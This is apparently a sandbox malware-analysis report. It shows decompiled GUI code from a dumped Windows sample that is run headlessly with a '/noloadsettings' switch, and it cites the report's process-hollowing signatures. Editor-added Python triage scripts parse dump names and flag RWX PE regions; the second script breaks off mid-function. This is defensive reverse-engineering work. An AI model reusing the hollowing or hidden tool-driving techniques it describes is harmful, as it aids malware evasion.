                                                                                                                                                                  						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x418348);
                                                                                                                                                                  					} else {
                                                                                                                                                                  						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
                                                                                                                                                                  						ShowWindow(GetDlgItem( *(_t98 + 4), 0x3ee), 0);
                                                                                                                                                                  					}
                                                                                                                                                                  					_v268 = 0;
                                                                                                                                                                  					memset( &_v267, 0, 0xff);
                                                                                                                                                                  					SetWindowTextA( *(_t98 + 4), E004019DA(_t100,  &_v268, 0x413450));
                                                                                                                                                                  					SetDlgItemTextA( *(_t98 + 4), 0x3ea, _t98 + 0xc);
                                                                                                                                                                  					SetDlgItemTextA( *(_t98 + 4), 0x3ec, _t98 + 0x10b);
                                                                                                                                                                  					E00401000(_t98, __eflags);
                                                                                                                                                                  					E0040649B(_t104,  *(_t98 + 4));
                                                                                                                                                                  					goto L29;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t67 = _t50 - 1;
                                                                                                                                                                  					if(_t67 == 0) {
                                                                                                                                                                  						_t68 = _a8;
                                                                                                                                                                  						__eflags = _t68 - 1;
                                                                                                                                                                  						if(_t68 != 1) {
                                                                                                                                                                  							goto L29;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							__eflags = _t68 >> 0x10;
                                                                                                                                                                  							if(_t68 >> 0x10 != 0) {
                                                                                                                                                                  								goto L29;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								EndDialog( *(__ecx + 4), 1);
                                                                                                                                                                  								DeleteObject( *(_t98 + 0x20c));
                                                                                                                                                                  								goto L8;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t73 = _t67 - 0x27;
                                                                                                                                                                  						if(_t73 == 0) {
                                                                                                                                                                  							_t74 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                                                                                                  							__eflags = _a12 - _t74;
                                                                                                                                                                  							if(_a12 != _t74) {
                                                                                                                                                                  								__eflags =  *0x418388;
                                                                                                                                                                  								if( *0x418388 == 0) {
                                                                                                                                                                  									goto L29;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t75 = GetDlgItem( *(_t98 + 4), 0x3ee);
                                                                                                                                                                  									__eflags = _a12 - _t75;
                                                                                                                                                                  									if(_a12 != _t75) {
                                                                                                                                                                  										goto L29;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										goto L18;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								L18:
                                                                                                                                                                  								SetBkMode(_a8, 1);
                                                                                                                                                                  								SetTextColor(_a8, 0xc00000);
                                                                                                                                                                  								_t62 = GetSysColorBrush(0xf);
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t78 = _t73 - 0xc8;
                                                                                                                                                                  							if(_t78 == 0) {
                                                                                                                                                                  								_t79 = _a12;
                                                                                                                                                                  								_t109 = _t79 & 0x0000ffff;
                                                                                                                                                                  								_v12.x = _t109;
                                                                                                                                                                  								_v12.y = _t79 >> 0x10;
                                                                                                                                                                  								_t81 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                                                                                                  								_push(_v12.y);
                                                                                                                                                                  								_a8 = _t81;
                                                                                                                                                                  								_t82 = ChildWindowFromPoint( *(_t98 + 4), _t109);
                                                                                                                                                                  								__eflags = _t82 - _a8;
                                                                                                                                                                  								if(_t82 != _a8) {
                                                                                                                                                                  									__eflags =  *0x418388;
                                                                                                                                                                  									if( *0x418388 == 0) {
                                                                                                                                                                  										goto L29;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t83 = GetDlgItem( *(_t98 + 4), 0x3ee);
                                                                                                                                                                  										_push(_v12.y);
                                                                                                                                                                  										_t84 = ChildWindowFromPoint( *(_t98 + 4), _v12.x);
                                                                                                                                                                  										__eflags = _t84 - _t83;
                                                                                                                                                                  										if(_t84 != _t83) {
                                                                                                                                                                  											goto L29;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											goto L13;
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									L13:
                                                                                                                                                                  									SetCursor(LoadCursorA( *0x417b94, 0x67));
                                                                                                                                                                  									goto L8;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								if(_t78 != 0) {
                                                                                                                                                                  									L29:
                                                                                                                                                                  									_t62 = 0;
                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t89 = _a12;
                                                                                                                                                                  									_t111 = _t89 & 0x0000ffff;
                                                                                                                                                                  									_v12.x = _t111;
                                                                                                                                                                  									_v12.y = _t89 >> 0x10;
                                                                                                                                                                  									_t91 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                                                                                                  									_push(_v12.y);
                                                                                                                                                                  									_a8 = _t91;
                                                                                                                                                                  									if(ChildWindowFromPoint( *(_t98 + 4), _t111) != _a8) {
                                                                                                                                                                  										__eflags =  *0x418388;
                                                                                                                                                                  										if( *0x418388 == 0) {
                                                                                                                                                                  											goto L29;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t93 = GetDlgItem( *(_t98 + 4), 0x3ee);
                                                                                                                                                                  											_push(_v12.y);
                                                                                                                                                                  											_t94 = ChildWindowFromPoint( *(_t98 + 4), _v12);
                                                                                                                                                                  											__eflags = _t94 - _t93;
                                                                                                                                                                  											if(_t94 != _t93) {
                                                                                                                                                                  												goto L29;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												_push(0x418388);
                                                                                                                                                                  												goto L7;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_push(_t98 + 0x10b);
                                                                                                                                                                  										L7:
                                                                                                                                                                  										_push( *(_t98 + 4));
                                                                                                                                                                  										E00406552();
                                                                                                                                                                  										L8:
                                                                                                                                                                  										_t62 = 1;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t62;
                                                                                                                                                                  			}

Address column for the decompiled function above (instruction offsets 0x00401060 to 0x004012eb within the dumped image).

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2998058495-0
                                                                                                                                                                  • Opcode ID: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                                                                                                                                                                  • Instruction ID: d9fb6b658f62cfbd3d3feccfc88cd7b26f9bda258aecb32a4b2b6428ade5212d
                                                                                                                                                                  • Opcode Fuzzy Hash: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                                                                                                                                                                  • Instruction Fuzzy Hash: 21619D31400248FBDF129F60DD89BAA7FA5EB04715F14C1B6F908BA2F1C7759A90DB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
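
The dump reference above carries more than a file name: the function's addresses are virtual addresses inside the region dumped from 0x400000, and the 00000040 field is that region's Win32 page protection, PAGE_EXECUTE_READWRITE. A complete PE image sitting in a single executable-and-writable region is the footprint that process hollowing leaves behind, which is what the report's own signatures ("Sample uses process hollowing technique", "Injects a PE file into a foreign processes") say this sample does. The following is an added example, not part of this report or of Joe Sandbox's tooling: it decodes such a reference, maps a listing address to its byte offset inside the .sdmp, and flags the RWX-PE pattern. The field order of the .sdmp name is an assumption inferred from the two names on this page; only the base-address and protection fields are interpreted, the rest are carried through as opaque values.

```python
"""Decode a Joe Sandbox memory-dump reference and map listing addresses into it.

Added example, not part of this report or of Joe Sandbox's own tooling.
ASSUMPTION (not stated on the page): the .sdmp name is dot-separated as
  <process index, hex>.<dump number>.<unique id>.<base VA, hex>.<page protection, hex>.<type>.sdmp
inferred from the two names on this page; only the base VA and protection
fields are interpreted, the others are carried through untouched.
"""
import re

# Win32 page-protection constants from winnt.h (authoritative values).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE_MASK = 0x04 | 0x08 | 0x40 | 0x80

SDMP_NAME = re.compile(
    r"^([0-9a-f]{8})\.([0-9a-f]{8})\.(\d+)\.([0-9a-f]{16})\.([0-9a-f]{8})\.([0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


def parse_sdmp_name(name):
    """Split an .sdmp file name into its fields and decode the protection word."""
    m = SDMP_NAME.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    proc, dump_no, uid, base, prot, kind = m.groups()
    prot = int(prot, 16)
    base_prot = prot & 0xFF
    names = [PAGE_PROTECTION.get(base_prot, f"0x{base_prot:02x}")]
    names += [n for bit, n in PAGE_MODIFIERS.items() if prot & bit]
    return {
        "name": name,
        "process_index": int(proc, 16),
        "dump_number": int(dump_no, 16),
        "unique_id": uid,
        "base": int(base, 16),
        "protection": prot,
        "protection_name": "|".join(names),
        "executable": bool(base_prot & EXECUTABLE_MASK),
        "writable": bool(base_prot & WRITABLE_MASK),
        "type_field": int(kind, 16),
    }


def va_to_dump_offset(va, dump):
    """A .sdmp is a raw copy of the mapped region, so a virtual address from the
    listing (the 0x00401060 ... 0x004012eb column above) is just VA - base.
    No section-table translation is needed, unlike for the PE on disk."""
    if va < dump["base"]:
        raise ValueError(f"0x{va:08x} lies below the dump base 0x{dump['base']:08x}")
    return va - dump["base"]


def hollowing_candidates(entries):
    """entries: iterable of (sdmp name, based_on_pe flag from the report).

    A normally loaded image gets per-section protections (code execute-read,
    data read-write); a complete PE sitting in one region that is both
    executable and writable is consistent with memory allocated RWX in a
    foreign process and written with a PE, i.e. the pattern behind the
    'process hollowing' signature in this report. Returns the parsed dumps
    that match."""
    hits = []
    for name, based_on_pe in entries:
        d = parse_sdmp_name(name)
        if based_on_pe and d["executable"] and d["writable"]:
            d["reason"] = f"PE image at 0x{d['base']:08x} with {d['protection_name']}"
            hits.append(d)
    return hits


# Dump names taken from the 'Memory Dump Source' entry above; the based-on-PE
# flag is stated on the page only for the first, so the second is set False.
REPORT_DUMPS = [
    ("00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp", True),
    ("00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp", False),
]

if __name__ == "__main__":
    main_dump = parse_sdmp_name(REPORT_DUMPS[0][0])
    print(main_dump["protection_name"], hex(main_dump["base"]))
    for va in (0x00401060, 0x004012EB, 0x0040A88E):
        print(f"VA 0x{va:08x} -> dump offset 0x{va_to_dump_offset(va, main_dump):x}")
    for hit in hollowing_candidates(REPORT_DUMPS):
        print("hollowing candidate:", hit["reason"])
```

The offset returned by va_to_dump_offset is what to seek to when opening the .sdmp in a hex editor or loading it into a disassembler with the image base set to 0x400000; the same address in the on-disk PE would first have to be translated through the section table. Treat hollowing_candidates as a triage hint, not a verdict: an unpacker that decompresses its own image in place produces the same RWX-PE footprint, which is why the report lists "overwrites its own PE header" alongside the hollowing signature.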

                                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                                  			E0040A88E(intOrPtr __ecx, void* __eflags) {
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				struct HMENU__* _t121;
                                                                                                                                                                  				struct HWND__* _t122;
                                                                                                                                                                  				intOrPtr _t128;
                                                                                                                                                                  				int _t133;
                                                                                                                                                                  				intOrPtr _t135;
                                                                                                                                                                  				int _t149;
                                                                                                                                                                  				void* _t166;
                                                                                                                                                                  				char* _t174;
                                                                                                                                                                  				void* _t178;
                                                                                                                                                                  				void* _t185;
                                                                                                                                                                  				intOrPtr _t194;
                                                                                                                                                                  				void* _t197;
                                                                                                                                                                  				void* _t198;
                                                                                                                                                                  				intOrPtr _t200;
                                                                                                                                                                  				intOrPtr _t201;
                                                                                                                                                                  				void* _t202;
                                                                                                                                                                  				int _t204;
                                                                                                                                                                  				intOrPtr _t205;
                                                                                                                                                                  				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t213;

				_t213 = __eflags;
				_t208 = _t210 - 0x78;
				_t211 = _t210 - 0xb8;
				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
				 *((char*)(_t208 - 0x37)) = 1;
				 *(_t208 - 0x40) = 0;
				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
				 *((char*)(_t208 - 0x38)) = 0;
				 *((char*)(_t208 - 0x36)) = 0;
				 *((char*)(_t208 - 0x35)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 0x2c) = 1;
				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
				 *((char*)(_t208 - 0x24)) = 4;
				 *((char*)(_t208 - 0x23)) = 0;
				 *((char*)(_t208 - 0x22)) = 0;
				 *((char*)(_t208 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 - 0x18)) = 5;
				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
				 *((char*)(_t208 - 0x10)) = 4;
				 *((char*)(_t208 - 0xf)) = 0;
				 *((char*)(_t208 - 0xe)) = 0;
				 *((char*)(_t208 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 4) = 2;
				 *_t208 = 0x9c48;
				 *((char*)(_t208 + 4)) = 4;
				 *((char*)(_t208 + 5)) = 0;
				 *((char*)(_t208 + 6)) = 0;
				 *((char*)(_t208 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x10)) = 3;
				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
				 *((char*)(_t208 + 0x18)) = 4;
				 *((char*)(_t208 + 0x19)) = 0;
				 *((char*)(_t208 + 0x1a)) = 0;
				 *((char*)(_t208 + 0x1b)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x24)) = 0;
				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
				 *((char*)(_t208 + 0x2c)) = 4;
				 *((char*)(_t208 + 0x2d)) = 0;
				 *((char*)(_t208 + 0x2e)) = 0;
				 *((char*)(_t208 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x38)) = 6;
				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
				 *((char*)(_t208 + 0x40)) = 4;
				 *((char*)(_t208 + 0x41)) = 0;
				 *((char*)(_t208 + 0x42)) = 0;
				 *((char*)(_t208 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
				 *((char*)(_t208 + 0x54)) = 4;
				 *((char*)(_t208 + 0x55)) = 0;
				 *((char*)(_t208 + 0x56)) = 0;
				 *((char*)(_t208 + 0x57)) = 0;
				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
				asm("stosd");
				_t198 = 0x66;
				asm("stosd");
				_t121 = E00407D23(_t198);
				_t194 =  *((intOrPtr*)(_t208 + 0x70));
				 *(_t194 + 0x11c) = _t121;
				_t122 = SetMenu( *(_t194 + 0x108), _t121);
				__imp__#6(0x50000000, 0x41344f,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
				 *(_t194 + 0x114) = _t122;
				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x417b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
				E00402393( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x417b94, 0), 1);
				_t128 =  *((intOrPtr*)(_t194 + 0x370));
				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
				if(_t173 <= 0) {
					L3:
					_t201 =  *((intOrPtr*)(_t194 + 0x370));
					E0040A02E(_t201);
					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x417b94, 0x66));
					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
						E00409F9C(_t133, _t173, _t194, _t201);
					}
					_t202 = 0x68;
					 *((intOrPtr*)(_t194 + 0x154)) = E00407D23(_t202);
					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
						_t174 = 0x41344f;
					} else {
						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
							_t174 = 0;
						} else {
							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
						}
					}
					_push("/noloadsettings");
					_push(_t174);
					L00412072();
					if(_t135 == 0) {
						RegDeleteKeyA(0x80000001, 0x41344f);
					}
					E0040B031(_t194, 0);
					 *( *(_t194 + 0x36c)) = 1;
					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
					if( *0x418660 == 0) {
						E0040617C(0x418660);
						if((GetFileAttributesA(0x418660) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x418660);
						}
					}
					_t204 = strlen(0x418660);
					 *_t211 = "report.html";
					_t99 = strlen(??) + 1; // 0x1
					_t223 = _t204 + _t99 - 0x104;
					if(_t204 + _t99 >= 0x104) {
						 *((char*)(_t194 + 0x264)) = 0;
					} else {
						E004062B7(_t194 + 0x264, 0x418660, "report.html");
					}
					_push(1);
					_t178 = 0x30;
					E0040A175( *((intOrPtr*)(_t194 + 0x370)), _t178);
					E0040A175( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
					_t205 = _t194;
					 *(_t194 + 0x374) = _t149;
					E0040A3E9(0, 1, _t205, _t223);
					E00401E4A(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
					 *(_t208 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t207 = _t200 + 0xc;
					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
					do {
						_t173 =  *((intOrPtr*)(_t207 - 8));
						E0040492F( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
						_t211 = _t211 + 0x10;
						_t207 = _t207 + 0x14;
						_t82 = _t208 + 0x74;
						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
					} while ( *_t82 != 0);
					goto L3;
				}
			}
                                                                                                                                                                  0x0040a8ff
                                                                                                                                                                  0x0040a906
                                                                                                                                                                  0x0040a90d
                                                                                                                                                                  0x0040a911
                                                                                                                                                                  0x0040a914
                                                                                                                                                                  0x0040a917
                                                                                                                                                                  0x0040a91f
                                                                                                                                                                  0x0040a920
                                                                                                                                                                  0x0040a921
                                                                                                                                                                  0x0040a928
                                                                                                                                                                  0x0040a92f
                                                                                                                                                                  0x0040a933
                                                                                                                                                                  0x0040a936
                                                                                                                                                                  0x0040a939
                                                                                                                                                                  0x0040a941
                                                                                                                                                                  0x0040a942
                                                                                                                                                                  0x0040a943
                                                                                                                                                                  0x0040a946
                                                                                                                                                                  0x0040a94d
                                                                                                                                                                  0x0040a951
                                                                                                                                                                  0x0040a954
                                                                                                                                                                  0x0040a957
                                                                                                                                                                  0x0040a95f
                                                                                                                                                                  0x0040a960
                                                                                                                                                                  0x0040a961
                                                                                                                                                                  0x0040a968
                                                                                                                                                                  0x0040a96f
                                                                                                                                                                  0x0040a973
                                                                                                                                                                  0x0040a976
                                                                                                                                                                  0x0040a979
                                                                                                                                                                  0x0040a981
                                                                                                                                                                  0x0040a982
                                                                                                                                                                  0x0040a983
                                                                                                                                                                  0x0040a98a
                                                                                                                                                                  0x0040a991
                                                                                                                                                                  0x0040a995
                                                                                                                                                                  0x0040a998
                                                                                                                                                                  0x0040a99b
                                                                                                                                                                  0x0040a99e
                                                                                                                                                                  0x0040a9a7
                                                                                                                                                                  0x0040a9aa
                                                                                                                                                                  0x0040a9ab
                                                                                                                                                                  0x0040a9ac
                                                                                                                                                                  0x0040a9b1
                                                                                                                                                                  0x0040a9bb
                                                                                                                                                                  0x0040a9c1
                                                                                                                                                                  0x0040a9dc
                                                                                                                                                                  0x0040a9ee
                                                                                                                                                                  0x0040a9f4
                                                                                                                                                                  0x0040aa41
                                                                                                                                                                  0x0040aa79
                                                                                                                                                                  0x0040aa7e
                                                                                                                                                                  0x0040aa84
                                                                                                                                                                  0x0040aa8c
                                                                                                                                                                  0x0040aa98
                                                                                                                                                                  0x0040aa9b
                                                                                                                                                                  0x0040aac4
                                                                                                                                                                  0x0040aac4
                                                                                                                                                                  0x0040aacc
                                                                                                                                                                  0x0040aae7
                                                                                                                                                                  0x0040aaf3
                                                                                                                                                                  0x0040aaf5
                                                                                                                                                                  0x0040aaf5
                                                                                                                                                                  0x0040aafc
                                                                                                                                                                  0x0040ab02
                                                                                                                                                                  0x0040ab08
                                                                                                                                                                  0x0040ab11
                                                                                                                                                                  0x0040ab26
                                                                                                                                                                  0x0040ab13
                                                                                                                                                                  0x0040ab16
                                                                                                                                                                  0x0040ab22
                                                                                                                                                                  0x0040ab18
                                                                                                                                                                  0x0040ab1d
                                                                                                                                                                  0x0040ab1d
                                                                                                                                                                  0x0040ab16
                                                                                                                                                                  0x0040ab2b
                                                                                                                                                                  0x0040ab30
                                                                                                                                                                  0x0040ab31
                                                                                                                                                                  0x0040ab3a
                                                                                                                                                                  0x0040ab46
                                                                                                                                                                  0x0040ab46
                                                                                                                                                                  0x0040ab4f
                                                                                                                                                                  0x0040ab5a
                                                                                                                                                                  0x0040ab6c
                                                                                                                                                                  0x0040ab7d
                                                                                                                                                                  0x0040ab7f
                                                                                                                                                                  0x0040ab8d
                                                                                                                                                                  0x0040ab95
                                                                                                                                                                  0x0040ab95
                                                                                                                                                                  0x0040ab8d
                                                                                                                                                                  0x0040aba1
                                                                                                                                                                  0x0040aba3
                                                                                                                                                                  0x0040abaf
                                                                                                                                                                  0x0040abb3
                                                                                                                                                                  0x0040abb9
                                                                                                                                                                  0x0040abd4
                                                                                                                                                                  0x0040abbb
                                                                                                                                                                  0x0040abcb
                                                                                                                                                                  0x0040abd1
                                                                                                                                                                  0x0040abe0
                                                                                                                                                                  0x0040abe4
                                                                                                                                                                  0x0040abe5
                                                                                                                                                                  0x0040abfc
                                                                                                                                                                  0x0040ac06
                                                                                                                                                                  0x0040ac0e
                                                                                                                                                                  0x0040ac10
                                                                                                                                                                  0x0040ac16
                                                                                                                                                                  0x0040ac27
                                                                                                                                                                  0x0040ac43
                                                                                                                                                                  0x0040ac4a
                                                                                                                                                                  0x0040ac51
                                                                                                                                                                  0x0040ac6d
                                                                                                                                                                  0x0040aa9d
                                                                                                                                                                  0x0040aa9d
                                                                                                                                                                  0x0040aaa0
                                                                                                                                                                  0x0040aaa3
                                                                                                                                                                  0x0040aaab
                                                                                                                                                                  0x0040aab4
                                                                                                                                                                  0x0040aab9
                                                                                                                                                                  0x0040aabc
                                                                                                                                                                  0x0040aabf
                                                                                                                                                                  0x0040aabf
                                                                                                                                                                  0x0040aabf
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040aaa3

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407D23: LoadMenuA.USER32 ref: 00407D2B
                                                                                                                                                                    • Part of subcall function 00407D23: sprintf.MSVCRT ref: 00407D4E
                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040A9C1
                                                                                                                                                                  • #6.COMCTL32(50000000,0041344F,?,00000101), ref: 0040A9DC
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A9F4
                                                                                                                                                                  • LoadImageA.USER32 ref: 0040AA0A
                                                                                                                                                                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040AA34
                                                                                                                                                                  • CreateWindowExA.USER32 ref: 0040AA6A
                                                                                                                                                                  • LoadIconA.USER32 ref: 0040AAD9
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040AAE7
                                                                                                                                                                  • _stricmp.MSVCRT(0041344F,/noloadsettings), ref: 0040AB31
                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(80000001,0041344F), ref: 0040AB46
                                                                                                                                                                  • SetFocus.USER32(?,00000000), ref: 0040AB6C
                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00418660), ref: 0040AB85
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00418660), ref: 0040AB95
                                                                                                                                                                  • strlen.MSVCRT ref: 0040AB9C
                                                                                                                                                                  • strlen.MSVCRT ref: 0040ABAA
                                                                                                                                                                  • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AC06
                                                                                                                                                                    • Part of subcall function 0040492F: strlen.MSVCRT ref: 0040494C
                                                                                                                                                                    • Part of subcall function 0040492F: SendMessageA.USER32 ref: 00404970
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040AC51
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040AC64
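As a practical check on the listing above, the block below parses these "APIs" lines into structured records and flags the pattern visible at 0040AB31, 0040AB46 and 0040AB95: a command-line compare against a settings-skipping switch, deletion of a key under HKEY_CURRENT_USER, and resolution of the temp directory for an output file, which together read as a GUI utility being driven non-interactively. This is an added example by the editor, not part of the Joe Sandbox report or of the analysed sample. The nine sample lines are copied from the listing above; the indicator names, the alias list for the string-compare routine and the "all three present" threshold are the editor's assumptions.

```python
"""Parse Joe Sandbox 'APIs' listing lines and flag a headless-tool pattern.

Added example by the editor; not part of the Joe Sandbox report or the sample.
SAMPLE_LISTING is copied from the API listing of the function above.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# A report line looks like one of:
#   • SetMenu.USER32(?,00000000), ref: 0040A9C1
#   • LoadImageA.USER32 ref: 0040AA0A
#   • Part of subcall function 00407D23: LoadMenuA.USER32 ref: 00407D2B
# '?' marks an argument value the sandbox could not recover.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Predefined registry root handles (winreg.h); the report prints them as raw hex.
HKEY_NAMES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int            # call-site address inside the dumped image
    caller: int | None  # set when the line is 'Part of subcall function ...'


def parse_api_listing(text: str) -> list[ApiCall]:
    """Return one ApiCall per recognised bullet line; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        caller = int(m["caller"], 16) if m["caller"] else None
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), caller))
    return calls


def decode_hkey(arg: str) -> str:
    """Translate a raw HKEY handle ('80000001') to its name; '?' and non-hex stay as-is."""
    try:
        return HKEY_NAMES.get(int(arg, 16), arg)
    except ValueError:
        return arg


def headless_tool_indicators(calls: list[ApiCall]) -> dict[str, list[int]]:
    """Map indicator name -> call-site addresses where it was observed.

    Editor's heuristic, not a Joe Sandbox signature: the function compares its
    command line against a 'skip settings' switch, deletes its own settings key
    under HKCU and resolves the temp directory, i.e. it is being run headlessly.
    The alias list for the compare routine is an assumption.
    """
    found: dict[str, list[int]] = {
        "settings_skip_switch": [],
        "hkcu_key_deleted": [],
        "temp_path_resolved": [],
    }
    for c in calls:
        if c.api in ("_stricmp", "_strcmpi", "lstrcmpiA") and "/noloadsettings" in c.args:
            found["settings_skip_switch"].append(c.ref)
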